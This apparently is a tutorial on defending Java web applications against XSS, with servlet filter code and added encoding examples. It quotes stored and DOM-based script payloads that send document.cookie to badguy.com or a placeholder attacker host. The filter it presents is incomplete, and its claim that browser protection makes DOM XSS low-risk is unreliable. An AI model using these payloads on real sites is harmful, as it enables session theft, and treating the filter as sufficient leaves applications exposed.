XSS Defense

Author: 江辉    Date: 2017-04-14

1. DOM-Based XSS Attacks

Risk level: low

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

The example above is a typical DOM-based attack: the attacker sends the victim a link, the victim clicks it, and the attacker's own server receives the victim's cookie.

Analysis:

Current mainstream browsers ship with protection against XSS (Cross-Site Scripting) enabled by default. This type of attack therefore carries a low risk, and as long as users do not click dangerous links that were not sent by an official source, information theft can be avoided.

2. Stored XSS

Risk level: high; severe impact, affects many users

Alex discovers an XSS vulnerability on website A that allows attack code to be saved in the database. Alex publishes an article with malicious JavaScript embedded in it. When other users such as Monica view the article, the embedded JavaScript runs in Monica's browser, and her session cookie or other information is stolen by Alex.

The attacker registers an account on a site, applies for financing, and fills in the remarks field with:

<script>window.open('http://黑客自己搭建的一个项目地址?cookie=document.cookie')</script>

After submission, a back-office reviewer opens the application without suspecting anything; at that moment the script fires and the reviewer's cookie is stolen.
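The scenario above is what render-time output encoding prevents: whatever was stored in the remarks field, the review page must emit it as text, not markup. The following is an added example, not code from the original post or from the com.jlfex project. It contrasts a context-aware HTML encoder with the approach used by the filter in section 3 below, which only swaps ASCII `<` and `>` for their full-width forms on the way in. The class and method names (`HtmlEncoderDemo`, `encodeForHtml`, `angleBracketsOnly`, `renderNote`), the attacker host `attacker.example`, and the sample remarks are all constructed for this example.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Added example (hypothetical class): render-time HTML encoding of a stored remark.
public class HtmlEncoderDemo {

    /** Encodes a value for safe insertion into HTML element content or a quoted attribute. */
    public static String encodeForHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break; // &apos; is not defined in HTML 4
                case '/':  sb.append("&#47;");  break; // keeps "</" sequences inert
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** The strategy of the page's request wrapper: ASCII angle brackets become full-width ones. */
    public static String angleBracketsOnly(String s) {
        if (s == null || s.isEmpty()) {
            return s;
        }
        return s.replace('<', '\uFF1C').replace('>', '\uFF1E');
    }

    /** Renders a stored remark into the two contexts a typical review page uses. */
    public static String renderNote(String storedNote) {
        String safe = encodeForHtml(storedNote);
        return "<input type=\"text\" value=\"" + safe + "\">\n"
             + "<p class=\"note\">" + safe + "</p>";
    }

    public static void main(String[] args) {
        // Constructed inputs; the first mirrors the stored-XSS payload quoted on the page.
        Map<String, String> samples = new LinkedHashMap<>();
        samples.put("stored payload",
            "<script>window.open('http://attacker.example/?cookie=document.cookie')</script>");
        samples.put("quote and ampersand", "Tom \"Big\" O'Neil & Sons");
        samples.put("plain text", "Funding request for Q3 expansion");

        for (Map.Entry<String, String> e : samples.entrySet()) {
            String in = e.getValue();
            System.out.println("== " + e.getKey());
            System.out.println("page filter : " + angleBracketsOnly(in));
            System.out.println("html encoded: " + encodeForHtml(in));
        }
        System.out.println();
        System.out.println(renderNote(samples.get("quote and ampersand")));
    }
}
```

Two things stand out when this runs. First, `angleBracketsOnly` leaves `"` and `&` untouched, so a remark echoed inside `value="..."` can still terminate the attribute; `encodeForHtml` neutralises every character that matters in both contexts. Second, the full-width substitution silently alters legitimate data (a remark such as `a < b` is changed forever in the database), whereas encoding at render time keeps the stored value intact and can be applied per context.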

3. Defensive Measures

The measures below target Java applications; purchasing a web application firewall is another option.

  • 1. Define a filter in web.xml to filter requests

    ```xml
    <filter>
      <filter-name>XssEscape</filter-name>
      <filter-class>com.jlfex.common.servlet.XssFilter</filter-class>
    </filter>
    <filter-mapping>
      <filter-name>XssEscape</filter-name>
      <url-pattern>/*</url-pattern>
    </filter-mapping>
    ```
  • 2. XssFilter.java

```java
package com.jlfex.common.servlet;

import org.apache.commons.lang3.StringUtils;

import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;

/**
 * User: PC
 * Date: 2017/4/5 14:16
 */
public class XssFilter implements Filter {

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        // nothing to initialise
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        String requestType = ((HttpServletRequest) request).getHeader("X-Requested-With");
        // Guard against XSS in asynchronous (Ajax) requests. Only requests carrying the
        // XMLHttpRequest header are wrapped; a plain HTML form submission passes through unchanged.
        if (StringUtils.isNotEmpty(requestType) && requestType.equals("XMLHttpRequest")) {
            XssHttpServletRequestWrapper xssRequest =
                    new XssHttpServletRequestWrapper((HttpServletRequest) request);
            chain.doFilter(xssRequest, response);
        } else {
            chain.doFilter(request, response);
        }
    }

    @Override
    public void destroy() {
        // nothing to release
    }
}
```
  • 3. XssHttpServletRequestWrapper.java

```java
package com.jlfex.common.servlet;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;

/**
 * User: PC
 * Date: 2017/4/5 14:19
 */
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {

    private final HttpServletRequest orgRequest;

    /**
     * Constructs a request object wrapping the given request.
     *
     * @param request the original request
     * @throws IllegalArgumentException if the request is null
     */
    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
        orgRequest = request;
    }

    @Override
    public String getParameter(String name) {
        String value = super.getParameter(xssEncode(name));
        if (value != null) {
            value = xssEncode(value);
        }
        return value;
    }

    @Override
    public String[] getParameterValues(String name) {
        String[] results = super.getParameterValues(xssEncode(name));
        if (results == null || results.length == 0) {
            return null;
        }
        for (int i = 0; i < results.length; i++) {
            results[i] = xssEncode(results[i]);
        }
        return results;
    }

    @Override
    public String getHeader(String name) {
        String value = super.getHeader(xssEncode(name));
        if (value != null) {
            value = xssEncode(value);
        }
        return value;
    }

    /**
     * Replaces ASCII angle brackets with their full-width equivalents so that a tag such as
     * {@code <script>} is no longer parsed as HTML. Note that getParameterMap() and
     * getInputStream() are not overridden, so values read through them are left untouched.
     */
    private static String xssEncode(String s) {
        if (s == null || s.isEmpty()) {
            return s;
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '>':
                    sb.append('＞'); // full-width greater-than sign (U+FF1E)
                    break;
                case '<':
                    sb.append('＜'); // full-width less-than sign (U+FF1C)
                    break;
                default:
                    sb.append(c);
                    break;
            }
        }
        return sb.toString();
    }

    public HttpServletRequest getOrgRequest() {
        return orgRequest;
    }

    public static HttpServletRequest getOrgRequest(HttpServletRequest req) {
        if (req instanceof XssHttpServletRequestWrapper) {
            return ((XssHttpServletRequestWrapper) req).getOrgRequest();
        }
        return req;
    }
}
```
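The filter above only wraps requests that carry `X-Requested-With: XMLHttpRequest`, and the wrapper only rewrites `getParameter`, `getParameterValues` and `getHeader`. A quick way to see what a downstream servlet actually receives is to drive `XssFilter` with a minimal request double. The following harness is an added example, not code from the original post or from the com.jlfex project; it assumes `XssFilter` and `XssHttpServletRequestWrapper` from the listings above are on the classpath in the same package, and builds the fake `HttpServletRequest` with a `java.lang.reflect.Proxy`. The class name `XssFilterCheck`, the parameter name `remark` and the sample values are constructed for this example.

```java
package com.jlfex.common.servlet;

import javax.servlet.FilterChain;
import javax.servlet.http.HttpServletRequest;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

// Added example (hypothetical class): exercises the page's XssFilter with a request double.
public class XssFilterCheck {

    /** Builds a minimal HttpServletRequest via a dynamic proxy (constructed test double). */
    static HttpServletRequest fakeRequest(Map<String, String> headers, Map<String, String> params) {
        return (HttpServletRequest) Proxy.newProxyInstance(
            HttpServletRequest.class.getClassLoader(),
            new Class<?>[] { HttpServletRequest.class },
            (proxy, method, args) -> {
                switch (method.getName()) {
                    case "getHeader":
                        return headers.get((String) args[0]);
                    case "getParameter":
                        return params.get((String) args[0]);
                    case "getParameterValues": {
                        String v = params.get((String) args[0]);
                        return v == null ? null : new String[] { v };
                    }
                    default:
                        return null; // every other method is unused by this harness
                }
            });
    }

    /** Runs XssFilter and returns the "remark" parameter as the downstream servlet would see it. */
    static String remarkSeenByServlet(Map<String, String> headers, Map<String, String> params)
            throws Exception {
        final String[] seen = new String[1];
        // FilterChain is a single-method interface, so the "servlet" can be a lambda.
        FilterChain chain = (req, res) -> seen[0] = req.getParameter("remark");
        new XssFilter().doFilter(fakeRequest(headers, params), null, chain);
        return seen[0];
    }

    public static void main(String[] args) throws Exception {
        Map<String, String> params = new HashMap<>();
        params.put("remark", "<script>alert(1)</script>"); // constructed sample input

        Map<String, String> ajax = new HashMap<>();
        ajax.put("X-Requested-With", "XMLHttpRequest");
        System.out.println("Ajax request : " + remarkSeenByServlet(ajax, params));

        Map<String, String> formPost = new HashMap<>(); // a plain <form> submit sends no such header
        System.out.println("form request : " + remarkSeenByServlet(formPost, params));
    }
}
```

With the header present the servlet sees `＜script＞alert(1)＜/script＞`; without it the raw `<script>` string arrives untouched, which is exactly the path taken by the remarks form in the stored-XSS scenario of section 2. If the filter is meant to cover that form, the `X-Requested-With` check has to go, and the wrapper should also cover `getParameterMap()`; either way, render-time encoding remains the control that does not depend on how the value entered the system.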